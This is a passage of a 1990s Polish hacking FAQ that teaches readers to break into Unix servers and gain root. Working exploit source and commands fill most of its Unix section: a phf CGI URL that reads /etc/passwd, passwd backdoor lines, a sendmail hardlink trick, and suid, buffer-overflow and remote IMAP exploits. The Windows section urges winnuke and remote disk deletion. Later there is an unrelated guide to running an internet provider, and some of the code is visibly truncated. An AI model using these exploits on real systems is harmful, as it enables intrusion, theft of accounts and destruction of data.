      systemie i ma nieograniczone uprawnienia, ale nie przej-
      moj sie ty bedziesz tez  root-em  jak  opanujesz  sztuke
      wlamywania sie.

      Podstawowe komendy UNIXa: (w nawiasach odpowiedniki DOS)
                                 W-windows S-WINDOWS95

      dir/ls    - wyswietla katalog            (dir)
      cat       - wyswietla zawartosc pliku    (type)
      telnet    - uruchamia telnet            S(telnet)
      ftp       - uruchamia program do ftp    S(ftp)
      id        - identyfikacja uzytkownika
      finger    - pokazuje uzytkownikow
      echo      - pisze cos na urzadzeniu      (echo)
      kill      - zabija proces               S(C+A+del)
      su        - logowanie jako super-user
      pico      - prosty edytor                (edit)
      mc        - rodzaj nakladki na shella    (nc)
      chown     - zmienia wlasciciela pliku
      irc       - uruchamia klienta IRC
      fdisk     - formatuje dyski              (fdisk)
      adduser   - dodaje uzytkownika
      rm        - kasuje plik                  (del)
      cp        - kopioje plik                 (copy)
      ln        - zwiazuje pliki
      chfi      - zmienia dane uzytkownika
      startx    - uruchamia GUI               W(win)
      mail to:  - wysyla poczte


   4.2. Co nam bedzie potrzebne

      Wymienie co trzeba miec na poczatek:
      WINDOWS: windows 95,telnet,ftp,IE/NS,John the Ripper 1.4
               ,skanner portow,kilent IRC
      UNIX   : unix,telnet,ftp,NS/arena,jakis lamacz passwd,
               skaner portow,IRC
      w pakiecie windowsa znajdziemy telnet i ftp, a w  UNIXie
      dostaniemy telnet,ftp,NS/arnena i IRC
      Jak zgromadzisz te programy to sie nie  napalaj  zbytnio
      ,bo teraz przychodzi kolej na:

   4.3. Wlamywanie - teoria

      Na poczatek trzeba zalozyc co chcemy  zrobic:  proponuje
      zdobycie konta z uprawnieniami root-a.  Zeby  to  zrobic
      musisz sie nieco poduczyc jak dziala UNIX:
      plik passwd: znajduje sie najczesciej  w  katalogu  /etc
      zawiera on dane  uzytkownika,  przykladowa  linia  pliku
      passwd:
      hellfire:y57Sj.23/nJn7:133:100:Hell Fire:/hellfire:/bin/bash
      ozancza ona uzytkownika  hellfire  o  zakodowanym  hasle
      y57Sj.23/nJn7, numer uzytkonika-133 ,  a  grupa  dostepu
      100, prawdziwe dane to Hell  Fire  :)),  katalog  domowy
      /hellfire, a shell  znajduje  sie  w /bin/bash.  Czasami
      zamiast 13 znaczkow kodowanego hasla  znajduje  sie  'x'
      ,wtedu  hasla   znajduja   sie   w   pliku  /etc/shadow.
      Pierwsza metoda na wlamanie jest  dopisanie  linijki  do
      pliku  passwd np.  takiej: hack::0:0:/:/bin/bash.  Wtedy
      to uzytkownik o nazwie hack dostaje uprawnienia  root-a.
      Proste nie? Nie! :)) To nie jest takie  proste  zwaszcza
      kiedy nie masz zadnago konta na serwerze,  ale  wszystko
      jeszcze przed toba. Mozna tez rozkodowywac  znalezione w
      pliku passwd hasla przy pomocy programu  John The Ripper
      , mozna tez  wlamujac  sie  do  duzych  serwerow  szukac
      lamerii, ktora lubi nazywac swoje konta bardzo  podobnie
      do loginow lub dodajac na koncu jedynke (to  jak  serwer
      wymaga zeby podano w hasle jakies cyfry). Po znalezieniu
      dostepu do jakiegos konta trzeba  pomyslec  o  dopisaniu
      w.w. linijki, a teraz juz szczegolowo:

   4.4. Jak zdobyc plik passwd?

      Jezeli znamy jakies konto na tym serwerze  wystarczy  do
      niego wejsc i napisac cat /etc/passwd i mamy plik passwd
      ,sprawa sie nieco komplikuje jak nie  mamy  tam  zadnego
      konta.  Wtedy  mozna  zaczac  od  obejrzenia  stron  www
      serwera, czesto jest tam spis  uzytkownikow  domeny,  na
      pewno czesc z tych gosci jest lamerami i n.p.  jak  ktos
      nazywa sie john to haslo ma john1,john,nhoj itp.(chociaz
      ja lamiac kiedys jeden bardzo duzy serwer po zciagnieciu
      z niego okolo 250 kont  nie  rozszyfrowalem  zadnego  po
      mimo uzycia wordlisty 6 Mb a po przerobkach 68 Mb!)  gdy
      uda ci sie zlamac choc  jedno  zgrywaj  do  siebie  plik
      passwd i przejdz do nastepnego punktu. Jezeli jednak  ci
      sie nie  udalo  sproboj  uzyc  nastepujacych  adresow  w
      przegladarce www - w miejsce www.ofiara.com wpisz  nazwe
      serwera.
      http://www.ofiara.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
      lub
      http://www.ofiara.com/cgi-bin/php.cgi?/plik/do/przejrzenia

   4.5. Jak zdobyc plik shadow?

      Jezeli po zciagnieciu pliku passwd okazuje ze  hasla  sa
      shadowane tzn. sa  w pliku  /etc/shadow  to  sprawa  sie
      lekko komplikuje.  Najpierw  sprawdzamy  metody  ktorymi
      zdobylismy passwd  (cat,phf,php)  ale  skutecznosc  tych
      metod siega w porywach 1%.  Mozesz  jeszcze  poszukac  w
      roznych backup-ach na dysku (ja jak  wlamywalem  sie  do
      TPSA znalazlem zawartosc wszystkich plikow /etc/ w  kat.
      /disks/backup/IV1997/d13/all/etc/etc.tar :-) ).  Jak  ci
      sie uda to do John-a podlacz nie passwd tylko  shadow  i
      czekaj az cos zlamie.

   4.6. Mam konto... i co?

      Narazie mozesz  sie  zalogowac,  zobaczyc  co  gosc  tam
      trzyma, poczytac mu poczte, jak serwer jest lamerski,lub
      zlamales konto jakiegos goscia  z  duzymi  uprawnieniami
      mozesz sformatowac dyski itp. itd. mozesz  sie  postarac
      zalozyc sobie konto (komenda  adduser  lub  bezposrednio
      wpisac sie do pliku passwd).

   4.7. Sendmail

      Sendmail jest to  najpoularniejszy  program  sluzacy  do
      obslugi poczty pod unixem. Jest on tez jednym z najpopu-
      larniejszych narzedzi hackerow, z powodu na ilosc bledow
      ktore posiada. Rozne wersje mozna omijac w rozny  sposob
      nie bede ich opisywal sam tylko odwolam sie  tu  do  faq
      p0wera ktory opisal to wszystko dokladnie  w  swoim  faq
      z jednym wyjatkiem - sendmail 884. Kto chce dostac p0wer
      faq niech do mnie napisze to ja mu jes wysle.

      4.7.1 Sendmail 884

        Jest to metoda uzyskania root-a z sendmaila 884.Metoda
        podawana w  innych  faq  nie  dziala  z  powodu  braku
        mozliwosci zapisu  do  pliku  dead.letter .W  orginale
        polaczenia miedzy plikami  wygadaly tak:

        passwd -------> dead.letter

        nie mozna czegos takiego zrobic  nie  majac  root-a  w
        systemie (a jak mamy root-a to po co wtedy to robic):)
        ale polaczenia zrobic tak:

        passwd -------> jakis.plik <-------dead.letter

        w miejsce jakis.plik podac dowolny plik znajdujacy sie
        w tym samym filesystemie co dead.letter i passwd.
        Wszyscy ktorzy beda lamac jakis  884 niech sie do mnie
        odezwa i opisza czy im sie udalo.
        W praktyce wyglada to tak:
        -logujemy sie na konto
        -robimy I linka (ln /etc/passwd /users/zjs/jakis.plik)
        -robimy II linka(ln /var/tmp/dead.letter 
         /users/zjs/jakis.plik)
        -wysylamy poczte zawierajaca linije  do  wstawienia  w
         passwd na nieistniejacy adres
        -logujemy sie komenda su albo sulogin

   4.8. Exploity

       4.8. Exploity

      Exploit jest to program wykorzystujacy dziury w systemie
      operacyjnym, ktory moze dac nam  konto  root-a,  pokazac
      jakis plik i zrobic wiele innych pomocnych rzeczy. W 80%
      przypadkow uruchamia sie go komenda dcc plik.c, a  potem
      uruchamia sie ./plik
      Przyznaje sie bez bicia ze wiekszosc exploitow  pochodzi
      z innych faq.

      4.8.1. Debian 1.1

       Zostala duza dziora w emulatorze  dosa,  zeby  obejrzec
       kazdy  plik  napisz  "dos -F /plik/do.obejrzenia",  ale
       niestety wiekszosc adminow skasowala juz emulator dosa.
       Na czesci systemow zamiast "dos" trzeba wpisac "dosemu"

      4.8.2. Red Hat 2.1

       4.8.2.1. dum bug

        "/sbin/dump 0uf woot.dump /etc/shadow" zasada  dziala-
        nia jak w 2.8.1.

       4.8.2.2. abuse

        Ten exploit wykozystuje atrybut s+ pliku abuse.console
        , czasami gra  jest  w  innym  katalogu  wtedy  trzeba
        zmienic go w programie

-- CUT HERE --
#!/bin/sh
if test -u /usr/lib/games/abuse/abuse.console
then
echo System seems to be vunerable...
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo Executing Abuse...
/usr/lib/games/abuse/abuse.console
/bin/rm /tmp/undrv
if test -u /tmp/abuser
then
echo Exploit successful, suid shell located in /tmp/abuser
else
echo Exploit failed.
fi
else
echo Machine isn't vunerable.
fi
-- CUT HERE --

       4.8.2.3. rootshell

        Nie mam inforamcji o narazonych  systemach,  ale  moze
        dzialac na dosyc nowych redhat (powstal 5.1997).
        Zaklada na shella z uprawnieniami root-a :)
        Uzycie:
        $ cp zgv_exploit.c n.c
        $ cc -o n n.c
        $ ./n
        Oak driver: Unknown chipset (id =  0)
        bash#

-- CUT HERE --

#include 
#include 
#include 

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 4096
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() -4675;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("HOME", buffer, 1);

  execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
}

-- CUT HERE --

   4.8.3. Single

      Dziala na 100% linuxow i mysle ze tez na  duzo  unix-ow.
      Ta metoda na wlamanie jest nieco  inna  od  reszty.  Nie
      pozwala bowiem na wlamanie z sieci ( w kazdym  razie  mi
      sie to jeszcze nie udalo ), tylko trzeba  siedziec  przy
      klawiaturze komputera do ktorego sie  wlamujemy.  Polega 
      ona  na  uruchomienie   komputera   w   trybie   jednego
      uzytkownika ( root-a ).
      1) ogladamy plik /etc/lilo.conf. Przed  pierwszym  image
         moze  byc linjka "password='haslo'" Trzeba  to  haslo
         zapamietac przyda  sie potem.
      2) sprawdzamy zdobyte haslo logujac sie jako root ( jest
         szansa  ze jest takie samo! )
      3) resetujemy komputer (  dobrze  jest  starac  sie  nie
         dopuscic   do   uruchomienia   BIOS-owej    procedury
         sprawdzania hasla!!! )
      4a) w LiLo Boot podajemy:
          LILO bot: linux single
      4b) w loadlin piszemy:
          loadlin init single
      5) jestesmy root-em! 
      6) tu robimy co  kto  uwaza  (  atrybut  s+  dla  chmod,  
         dodajemy swojego uzytkownika itp... )
      7) znowu resetujemy

      Metoda ta ma tylko jedna wade  -  trzeba  siedziec  przy
      klawiaturze komputera ofiary - chociaz moze ktos wymysli
      metode zrobienia  tego zdalnie?

   4.8.4. FreeBSD 2.2.1
      Jest duzy blad w FreeBSD 2.2.1 ( prawdopodobnie bedzie tez dzial pod 3.x)

--CUT HERE--

#include 
#include 
#include 
#include 
#include 

u_char search_code[13] = {
0x8d, 0x05, 0x17, 0x00, 0x00, 0x00,           /* leal 0x17, %eax */
0x9a, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00};    /* lcall 7,0 */

/* just do a xor %eax, %eax and then a ret */
u_char new_code[] = {
0x31, 0xc0, 0xc3};

main(int argc, char **argv)
{
        int pid;
        int fd;
        char buff[40];
        char *user;

        /* might need to tweak these */
        u_int offset=0x8003000;
        u_int offset_end = 0x8099000;

        if(argc < 2)
        {
                fprintf(stderr, "%s user\n", argv[0]);
                exit(1);
        }
        printf("Demonstration of 4.4BSD procfs hole\n");
        printf("Brian Mitchell \n\n");
        printf("after you see \"setuid changed\", enter the pw for the user\n");
        printf("\aBe warned, searching for the setuid() function takes a long time!\n");
        user=argv[1];
        pid = fork();
        switch(pid)
        {
                case -1:
                        perror("fork");
                        exit(1);
                case 0:
                        /* give parent time to open /proc/pid/mem */
                        sleep(3);
                        execl("/usr/bin/su", "su", user, NULL);
                        exit(0);
                default:
                        sprintf(buff, "/proc/%d/mem", pid);
                        fd = open(buff, O_RDWR);
                        if(fd < 0)
                        {
                                perror("open procmem");
                                wait(NULL);
                                exit(1);
                        }
                        /* wait for child to execute suid program */
                        sleep(6);
                        /* stop the child */
                        kill(pid, 17);
                        printf("searching - please be patient...\n");
                        /* search for the setuid code */
                        while(offset != offset_end)
                        {
                                lseek(fd, offset, SEEK_SET);
                                read(fd, buff, 13);
                                if(!bcmp(buff, search_code, 13))
                                {
                                        lseek(fd, offset, SEEK_SET);
                                        write(fd, new_code, 3);
                                        printf("setuid changed (0x%x)\n", offset);
                                        /* sigcont child */
                                        kill(pid, 19);
                                        wait(NULL);
                                        exit(0);
                                }
                                offset++;
                        }
                        printf("setuid not found!!\n");
                        kill(pid, 9);
                        wait(NULL);
                        exit(1);
        }
}

--CUT HERE--

   4.8.5. Linux-y

    Ten exploit dodaje linijke root::0:0:r00t:/:/bin/bashx  na
    pocztek pliku  passwd.  (shella  mozna  sobie  zmienic  na
    dowolnie innego).  Wedlug  autora  pracuje  na  wszystkich
    LINUX-ah ale ja w to nie wierze.

--CUT HERE--
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

  struct hostent *h;
  struct sockaddr_in tmp;
  struct in_addr in;

  h = gethostbyname(hostname);

  if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

  memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
  system("clear");
  printf("\nIMAP Exploit for Linux.\n");
  printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
  printf(" Modifications: p1 (p1@el8.org)\n");
}

main(int argc, char **argv) {

  int fd;
  struct sockaddr_in sckdaddr;
  char *hostname;
  char buf[4092];
  int i=8;
  char realegg[] =
    "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
    "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
  char *point = realegg;
  buf[0]='*';
  buf[1]=' ';
  buf[2]='l';
  buf[3]='o';
  buf[4]='g';
  buf[5]='i';
  buf[6]='n';
  buf[7]=' ';

  banner();

  if (argc<2)  {
     printf("\nUsage: %s \n\n", argv[0]);
     exit(-1);
  }

  hostname=argv[1];

  while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
    buf[i++]=0x90;

  while(*point)
    buf[i++]=*(point++);

  buf[i++]=0x83; /* ebp */
  buf[i++]=0xf3;
  buf[i++]=0xff;
  buf[i++]=0xbf;
  buf[i++]=0x88; /* ret adr */
  buf[i++]=0xf8;
  buf[i++]=0xff;
  buf[i++]=0xbf;

  buf[i++]=' ';
  buf[i++]='b';
  buf[i++]='a';
  buf[i++]='h';
  buf[i++]='\n';

  buf[i++]=0x0;


  if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
socket. \n");

  sckdaddr.sin_port=htons(143);
  sckdaddr.sin_family=AF_INET;
  sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

  if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
perror("Error with connecting. \n");

  printf("hmm: \n");
  getchar();
  write(fd,buf,strlen(buf)+1);
  printf("hmm: \n");
  close(fd);
}

--CUT HERE--

   4.8.6. HTTP/1.0 Server

    Wykozystuje dziure w skrypcie WRAP  dostarczanym  razem  z
    systemem IRIX 6.2. Zastosowanie jest proste:

    http://sgi.victim/cgi-bin/wrap?/../../../../../etc

   4.8.7. AIX 4.1/4.2

    Wykozystuje bug-a w programie mount. Kompilacja cc -g test2.c
    Jezeli podczas uruchamiania dostaniesz komunikat: 
    Memory Fault albo Illegal Instruction uzyj tego shella:

--CUT HERE--
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
done
*/
--CUT HERE--


--CUT HERE--
test2.c
22-Mar-97
*/
#include 
#include 
#include 


char prog[100]="/usr/sbin/mount";
char prog2[30]="mount";
extern int execv();

char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}

/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6        mfspr   r0,LR
9421fbb0        stu     SP,-1104(SP) --get stack
90010458        st      r0,1112(SP)
3c60f019        cau     r3,r0,0xf019 --CTR
60632c48        lis     r3,r3,11336  --CTR
90610440        st      r3,1088(SP)
3c60d002        cau     r3,r0,0xd002 --TOC
60634c0c        lis     r3,r3,19468  --TOC
90610444        st      r3,1092(SP)
3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
6063696e        lis     r3,r3,26990
90610438        st      r3,1080(SP)
3c602f73        cau     r3,r0,0x2f73
60636801        lis     r3,r3,26625
3863ffff        addi    r3,r3,-1
9061043c        st      r3,1084(SP) --terminate with 0
30610438        lis     r3,SP,1080
7c842278        xor     r4,r4,r4    --argv=NULL
80410440        lwz     RTOC,1088(SP)
80010444        lwz     r0,1092(SP) --jump
7c0903a6        mtspr   CTR,r0
4e800420        bctr              --jump
*/

#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
char VAR[30]="LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg=1;
int ch;
unsigned int reta; /* return address */
int corr=4604;
char *args[4];
char *newenv[8];
int justframes=1;
int startwith=0;

mn=78;
max=100;

if (argc>1)
        corr = atoi(argv[1]);

pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;

if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
        perror("Bad parameters");
        exit(1);
}

#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);

reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;

for(nop=0;nop
#include 
#include 
#include 
#include 
#include 
#include 

#define dport 139  /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye";  /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);


    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("Connected to [%s:%d].\n",server,port);
        return;
}


void main(int argc, char *argv[]) {

     if (argc != 2) {
       printf("Usage: %s \n",argv[0]);
       exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }

     open_sock(s,argv[1],dport);


     printf("Sending crash... ");
       send(s,str,strlen(str),MSG_OOB);
       usleep(100000);
     printf("Done!\n");
     close(s);
}

-- CUT HERE --

   4.8.9. SunOs 4.1.1 Sparc 20

    Zeby  spowodowac   'system panic'   wystarczy   przeczytac
    /dev/tcx0, czyli po prostu: cat /dev/tcx0

   4.8.10. tin/rin

    Prosty blad w NEWS readerze. Podczas uruchamiania programu
    tworzona jest w pliku /tpm/.tin_log lista  uzytkownikow  z
    atrybutem 666. Wystarczy wiec link  lub  symlink  do  tego
    pliku z passwd (lub innego pliku do  ktorego  chcemy  miec
    dostep) i gdy uzytkownik z UID=0 (root) uruchomii  tin/rin
    atrybut 666 zostanie przeniesiony na plik passwd :))


  5. The Microsoft Windows 95

   5.1. Kilka slow o Bilu Gates-ie i jego windowsie

      Na poczatek umowmy  sie  ze  bede  moj  ukochany  system
      operacyjny nazywal shit95 :-)
      Kiedys mialem chyba z jakiegos Bajtka albo Komputera  10
      punktow jak poznac zle zrobiony program -  shit  spelnil
      chyba 7 czy 8 :). Wszyscy chyba wiedza, ze jest to chyba
      najbadziewniejszy program jaki jest. Jest to  dowod,  ze
      mozna ludzia wcisnac  niewiadomo  jakie  gowno  byle  je
      dobrze zareklamowac. Wedlug mnie shit jest to  nawiekszy
      i  niewykrywalny  przez  zaden   program   antywirusowy,
      najbardziej rozpowszechniony WIRUS swiata! I jeszcze  sa
      tacy ktorzy placa microsoftowi za to zeby go sobie zain-
      stalowac! :-----)
      Dla rownowagi wymienie kilka jego  zalet:  nie  powoduje
      uzaleznien od komputera bo  po  10  minutach  pracy  sie
      zawiesza i raczej zraza ludzi do komputera niz uzaleznia
      Ma  sztuczna  inteligencje  -  czasami  sam   przestanie
      dzialac, skasuje kilka plikow, zainstaluje program ktory
      jest ci niepotrzebny. I kilka jeszcze innych... :-)
      Teraz zajme sie Bilem Gates-em - powiem krotko, jak  sie
      kiedys pojawi kolo mnie to posadze palanta przed monito-
      rem i kaze pisac nowy system... :)
      UWAGA!!! Teraz bedzie  moje  nowe  haslo  reklamowe  dla
      ukochanego systemu:
                         SHIT to GOWNO!

   5.2. Jak zabic windowsa?

      Jezeli spodkamy kogos z windowsem  na  IRC  wysylamy  mu
      winnuka, a jezeli gosc ma patha  to  zaczynamy  dobierac
      sie do niego portscanem - 90% ze  sie  zawiesi.  Sa  tez
      podobno programy do uruchamiania zdalnie komend windowsa
      takich jak "deltree c:\ -y" co spowoduje  skasowanie  mu
      wszystkich plikow z dysku bez pytania. :)

   5.3. WWWWW - Windows W World Wide Web

      Ten rozdzial tez jest dokladnie opisany w p0wer faq,  ja
      tylko dodam od siebie ze zamiast kalkulatora mozna  uzyc
      komendy "deltree c:\ -y"


   5.5. Internet Provider
                             Inet Provi FAQ

			    written by nEmEs	


	Moze nie wszyscy wiedza, ale jestem wspol Internet Providerem i chcialbym
przyblizyµ wam ten zawod, wbew pozorom trudny - DUZA Konkurencja !!!! Polbox i Onet SUX !


	1. Poczatki !
	 1.1 Wstep.
	 1.2 Podania do bardzo waznych instytucji panstwowych.
	 1.3 Co robic w czasie oczekiwania na zestawienie polaczenia.
	 
	2. Sprzet.
	 2.1 Serwer.
	 2.2 Stanowisko robocze.
	 2.3 Router.
	 2.4 Modemy na lacza dzierzawione o duzej szybkosci.

	3. Co robic jak cie juz podlacza.

	4. Trudne zycie - Hackerzy !!!

	5. Monopolisci
	 5.1 TP s.a.
	 5.2 Polpak
	 5.3 NASK.

	6. Calkowity koszt.



1. Poczatki !

	1.1 	Zanim pomyslisz: " ChcΩ byµ Internet Providerem 
	- zarobie duzo szmalu, w krotkim czasie. " zastanow czy 
	wiesz na co sie porywasz .... Nie mowie tu o twoich umie-
	jetnosciach. To wbrew pozorom jest bardzo latwe ( no w 
	pewnym stopniu jak masz kogo sie pytac ). Zapewne nie 
	zastanowiles sie jeszcze nad ponizszymi pytaniami:
		
		Zostaniesz Providerem i co dalej ? 

		Gdzie bedziesz szuka│ klient≤w ? 

		Czy klienci pozwola ci spsplacic dlugi ? (jesli 
		 ich nie bedziesz mial to jestes burzuj i cie stac
		 nawet na deficytowy interes)

		Skad wezmiesz nato pieniadze ? 

	Te pytania zaslania cie wizja (zazwyczaj mylna) bycia 
	Internet Providerem (no moze poza tym ostatnim). Postaram
	sie przedstawic Ci jak to ze mna bylo.

	1.2	No powiedzmy ,ze masz pieni╣dze lub ich oczeku-
	jesz, to najlepszy moment na tak zwane robote papierkowa.
	Najpierw musisz naskrobac pisemko do "uwielbianej" Tele-
	komunikacji Polskiej s.a. w twoim miescie, a najlepiej 
	sie tam osobiscie pofatygowac (skroci to bul oczekiwania
	 o jakies 2 tyg.) i spytac sie ich czy oni zalatwi╣ ci 
	polaczenie z Polpakiem, czy musisz sie fatygowac do wo-
	jewodzkiej TP s.a. lub do najblizszego wezla Polpaku. 
	(TP s.a. odpowiada za samo lacze a Polpak za podlaczenie 
	do naszego nalogu Internetu). Najpierw piszesz o mozli-
	wosci techniczne podlsczenia dzierzawki do twego lokalu,
	a potem o zestawienie lacza do Inetu. No powiedzmy, ze 
	ci podlacza ukochany kabelek. Teraz pora pojechac do 
	Warszawy do Ministerswa úacznosci i Telekomunikacji 
	i zlozyc podanie o przyznanie licencji na uslugi Tele-
	komunikacjyjne w tym Internetu. ( z tego co wiem jeszcze
	nie odmowili ).

	1.3	No ... teraz mozesz siedziec i czekac. Mozesz 
	uczyc jak byc Administratorem systemu, szukac klientow,
	zbierac jeszcze wiecej gotowki albo upic lub ujarac sie
	ze szczescia (pozniej bedziesz pil ze zmartwien !!! 
	- wiec teraz korzystaj i ciesz sie)

2. SprzΩt.

	2.1	Najwazniejsze to musisz wiedziec na jakim sys-
	temie go postawisz .....Server jest bardzo wa┐ny ... 
	musi podolac obsludze poczty, WWW, FTP i jeszcze innym 
	uslugom.

	Serwer postawiony na Shitcie - WindowsNT Serwer:
	Dual Pentium - min 150
	128 Mb RAM 
	HDD 2 GB to ciutke malo w przyszlosci i to SCSI
	CD-ROM min x8
	Mysz !!!!!

	Serwer postawiony na Linuxie - np. Red Hat 4.2:
	Pentium 133
	32 Mb RAM
	HDD 1 GB to ciutke malo w przyszlo£ci i to SCSI
	CD-ROM x8
	Monitor Hercules
	
	a polecam linux Red Hat 4.2:
	dual Pentium 133
	64 Mb RAM
	HDD 2,5 Gb SCSI
	CD x12
	Monitor Hercules

	2.2	To zalezy co bedziesz robic na nim......
	Ja mam sprzecik na Win95 i WinNT Workstation tzn:
	Itnel 166MMX, 64Mb ram , 4Gb SCSI i stwierdzam
	ze to do grafiki za malo :((((

	2.3	To wazne ...musisz miec dobry Router !!!!
	Ja zdecydowalem sie na Motorole ... ale jak nie masz
	kasy to kup karte Routera i postaw drugi sprzecik.

	2.4	Modemy zapewnia Polpak .... 
	Musz╣ byµ w standarcie v.35.

3. Co robic jak cie ju┐ podlacza.

	Jak to co robic .... zabawic sie !!!

	A tak powaznie to wyslac do NASKU maila o zarejestrowanie 
	domeny - to kosztuje grosze (patrzac na calosc) 150,-
	I szukac pierwszych klientow....konfigurowac serwer.

4. Trudne zycie - Hackerzy !!!

	To jest rzeczywisty problem - zawsze znajdzie sie taki 
	hacker ktory sie wlamie i narobi ci bajzlu ...........
	Wiec albo sam badz hackerem i miej z nimi dobre stosunki
	lub zapisz sie do grup dyskusyjnych o Linuxie i Ochronie
	danych (Zabezpieczania Linuxa) i instaluj ka┐dy najnowszy
	patch !!!
	A jak bedziesz mial ta przyjemnosc ... i ktos sie wlamie
	to czytaj wszystkie logi ... a jak ich nie bedzie to
	sprobuj je odzyskac...jest to zrodlo wszelkich informacji
	o potencjalnych wlamywaczach. Lub w desperacji wlacz IRC'a
	i idz na #hackpl i podpusc kogos .... jak sie postarasz
	to bedziesz wiedzial kto siΩ wlamal. A od nowego roku
	wchodzi w zycie nowe prawo i kazdy hacker moze isc do
	pudla.

5. Monopoli£ci.
		Charakterystyki .....

	5.1 Telekomunikacja Polska s.a. :
	    - d│ugo papiery wedruja z lokalnej siedziby do 
	      wojewodzkiej.
	    - zdzieraja majatek.
	
	5.2 Polpak
	    - zdzieraja majatek !!!
	    - czeste awarie

	5.3 NASK
	    - gubi╣ papiery i E-maile !!!
	    - s╣ Dyktatorem !!! podskoczysz to cie odlacza
	      dotyczy to umieszczania niewinnych stron
	      ( o charakterze edukacyjnym ) hackerow
	      jest to ograniczenie wolnosci slowa i pisma.

6. Ca│kowity koszt.
	
	Ca│kowity koszt to 20.000 z│ (nowych czyli 200mln starych)


No to koniec .... bede ciagle rozbudowywal FAQ ....
bazuj╣c na wlasnych doswiadczeniach.
NApewno wielu z was uzna to za nudny tekst .... szkoda
ale sadze ze pare osob to oswiecilo.

Uwagi prosze kierowac : reiden@multi-ip.com.pl nemes@mega.com.pl


	


--------------------------------------------------------------------------------

W przygotowywaniu faq brali udzial:

LordCreg - redagowanie i pare textow ( glowny odpowiedzialny za FAQ)

